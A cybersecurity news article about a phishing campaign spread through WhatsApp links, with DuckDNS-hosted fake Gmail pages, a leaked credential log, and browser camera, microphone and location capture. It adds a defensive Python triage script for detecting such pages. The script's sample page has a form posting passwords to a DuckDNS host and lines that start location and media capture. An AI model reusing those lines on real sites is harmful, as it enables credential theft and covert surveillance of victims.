Sophisticated Gmail Phishing Attacks Spreading Via WhatsApp Links
“Recently, sophisticated WhatsApp-linked Gmail phishing attacks have been claiming innocent victims.”
The campaign gained widespread attention after Iranian campaigner Nariman Gharib, who is living in the United Kingdom, revealed that he had received a dubious WhatsApp message with a link that seemed to relate to a virtual conference.
Gharib, who keeps a careful eye on the online aspects of Iran’s protest movement, provided proof of the attempt online and cautioned others against clicking on such sites.
He soon gave TechCrunch access to the complete phishing link and technical notes, enabling reporters and independent security researchers to investigate the attack’s architecture. Their investigation uncovered a sophisticated phishing scheme intended to enable real-time monitoring of victims’ devices in addition to stealing account credentials.
The revelation came at a delicate time: while protests and deadly crackdowns continue, Iran is undergoing its longest nationwide internet outage. In such a setting, secure digital communication has become both more important and more vulnerable.
Technical Analysis
The WhatsApp message delivered to Gharib directed targets to a phishing website hosted behind DuckDNS, a dynamic DNS service frequently used to conceal the actual location of servers.
This technique let the attackers create links that looked harmless but actually led visitors to dangerous websites hosted elsewhere.
Within the Attack Chain
The phishing infrastructure was ultimately traced to a domain registered in early November 2025. Related domains, whose naming patterns implied the attackers were also posing as providers of virtual meeting services, expanded the range of possible lures. According to investigators, the DuckDNS layer helped disguise the phishing links as authentic WhatsApp-related sites.
Although the page itself no longer loads, examining its source code provided insight into how the attack worked. Depending on the target, victims were either shown a phony Gmail login page or asked for a phone number, in order to capture passwords and two-factor authentication codes.

Surveillance, Credentials, and an Exposed Server
One of the most startling discoveries was a vulnerability on the attackers’ own servers. By modifying the phishing page’s URL, researchers were able to reach an exposed file that recorded victim submissions in real time. The file functioned as a keylogger and held over 850 entries, including usernames, passwords, unsuccessful login attempts, and two-factor codes.
A Middle Eastern professor with expertise in national security, a senior Lebanese cabinet minister, the head of an Israeli drone manufacturer, journalists, and others with ties to or residency in the United States were among the dozens of compromised victims identified by the data. The effort targeted people on Windows, macOS, iPhone, and Android devices, according to the logs.
The phishing malware allowed for device-level surveillance in addition to credential theft. After examining the code, security researcher Runa Sandvik discovered that the page asked for access to a victim’s location, microphone, and camera. If the victim granted permission, the browser would periodically record audio and photos and send location coordinates every few seconds; investigators did not, however, find any such media stored on the open server.
Simultaneously, some targets were presented with WhatsApp-themed sites displaying QR codes. Scanning the code could discreetly link a victim’s WhatsApp account to an attacker-controlled device. This is a known method that abuses the app’s multi-device capability and grants complete access to contacts and messages.
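As an added illustration (not the researchers’ tooling), here is a static triage script for a captured phishing page that flags the indicators described above: hosts on dynamic DNS providers such as DuckDNS, calls to the browser geolocation and camera/microphone APIs, a periodic timer consistent with repeated capture or beaconing, and a password field. The sample page is constructed for the example; the indicator names and scoring are assumptions.

```python
import re
from urllib.parse import urlparse

# Dynamic DNS providers to flag (DuckDNS is the one named in the article).
DYNDNS_PROVIDERS = ("duckdns.org",)

# Browser APIs a page needs for the surveillance behaviour described above.
PERMISSION_APIS = {
    "geolocation": r"navigator\.geolocation\.(watchPosition|getCurrentPosition)",
    "camera_or_microphone": r"\.getUserMedia\s*\(",
}
PERIODIC_TIMER = r"setInterval\s*\("            # repeated capture / beaconing
PASSWORD_INPUT = r"<input[^>]*type\s*=\s*[\"']password[\"']"

def is_dynamic_dns(host):
    return any(host == p or host.endswith("." + p) for p in DYNDNS_PROVIDERS)

def extract_hosts(html):
    urls = re.findall(r"https?://[^\s\"'<>]+", html)
    return {urlparse(u).hostname for u in urls} - {None}

def triage_page(html):
    """Return the indicators found in a captured page plus a simple score."""
    findings = {
        "dynamic_dns_hosts": sorted(h for h in extract_hosts(html) if is_dynamic_dns(h)),
        "permission_apis": sorted(k for k, p in PERMISSION_APIS.items() if re.search(p, html)),
        "periodic_timer": bool(re.search(PERIODIC_TIMER, html)),
        "password_field": bool(re.search(PASSWORD_INPUT, html, re.I)),
    }
    # One point per indicator category present (hypothetical scoring).
    findings["score"] = (int(bool(findings["dynamic_dns_hosts"]))
                         + len(findings["permission_apis"])
                         + int(findings["periodic_timer"])
                         + int(findings["password_field"]))
    return findings

# Constructed sample page mimicking the behaviour the article describes.
SAMPLE_PAGE = """<html><body>
<form action="https://login-verify.duckdns.org/submit" method="post">
  <input name="email"><input name="pw" type="password">
</form>
<img src="https://www.example.com/logo.png">
<script>
navigator.geolocation.watchPosition(reportLocation);
navigator.mediaDevices.getUserMedia({audio: true, video: true}).then(startCapture);
setInterval(captureFrame, 5000);
</script></body></html>"""

if __name__ == "__main__":
    for key, value in triage_page(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```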
Cybercrime, Espionage, or Both?
The question of attribution is still open. Some experts have suggested a state-backed operation due to the campaign’s restricted targeting, emphasis on high-value individuals, and interest in surveillance data.
Gary Miller, Citizen Lab:
The action had “the hallmarks of an IRGC-linked spearphishing campaign,” alluding to the Islamic Revolutionary Guard Corps of Iran, which has a track record of conducting targeted cyberattacks.

Others warn that financial motivations cannot be completely ruled out: stolen Gmail credentials and two-factor codes could also be used to access corporate email accounts, bitcoin wallets, and other monetizable assets.
Ian Campbell, Researcher, DomainTools (domain analysis):
Given that some domains existed months before the protests, the infrastructure is consistent with medium- to high-risk cybercrime activities.
Analysts also raise a hybrid possibility. Iran has previously contracted out cyber operations to criminal organizations, a tactic that provides plausible deniability while blurring the distinction between profit-driven hacking and espionage.
Researchers:
Accounts were successfully compromised by the campaign, and it might resurface in a different form. The experience highlights a recurrent lesson for at-risk groups as geopolitical conflict and digital repression intensify: even a convincing message on a familiar platform can be a route to intrusion, surveillance, and loss of control over one’s digital life.
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking.